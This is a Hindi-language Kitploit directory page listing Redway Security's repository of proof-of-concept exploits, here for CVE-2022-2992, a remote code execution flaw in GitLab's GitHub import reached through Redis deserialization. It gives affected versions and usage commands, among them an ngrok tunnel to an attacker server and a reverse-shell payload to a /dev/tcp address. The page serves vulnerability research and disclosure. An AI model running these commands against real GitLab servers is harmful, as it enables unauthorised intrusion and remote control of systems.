Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVEs — A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs. | Kitploit
उपकरण/GitHubGitHub/redwaysecurity/cves
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubredwaysecurity/cves

CVEs

A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-2992: Github आयात के माध्यम से रिमोट कमांड निष्पादन

जानकारी

विवरण: यह एक प्रमाणित उपयोगकर्ता को GitHub से आयात API एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।
प्रभावित संस्करण: 11.10 से 15.1.6 से पहले के सभी संस्करण, 15.2 से 15.2.4, 15.3 से 15.3.2
स्थिर संस्करण: 15.3.2
शोधकर्ता: vakzz
राइट-अप लिंक: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST CVE लिंक: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

विवरण

एक प्रमाणित उपयोगकर्ता Github से Gitlab में एक रिपॉजिटरी आयात कर सकता है। कोई व्यक्ति हमलावर के नियंत्रक सर्वर से आयात करने का प्रयास कर सकता है, जो नेस्टेड default_branch में एक Redis के सीरियलाइज़ेशन प्रोटोकॉल ऑब्जेक्ट के साथ उत्तर देता है, जिससे Gitlab इस ऑब्जेक्ट को redis पर कैश करता है और redis इसे डीसीरियलाइज़ करके पेलोड निष्पादित करने के लिए ट्रिगर करता है।

उपयोग/शोषण

किसी को एक व्यक्तिगत एक्सेस टोकन की आवश्यकता होगी

root@kitploit:~
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567  # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

उदाहरण

Github आयात के माध्यम से रिमोट कमांड निष्पादन

टूल डाउनलोड करें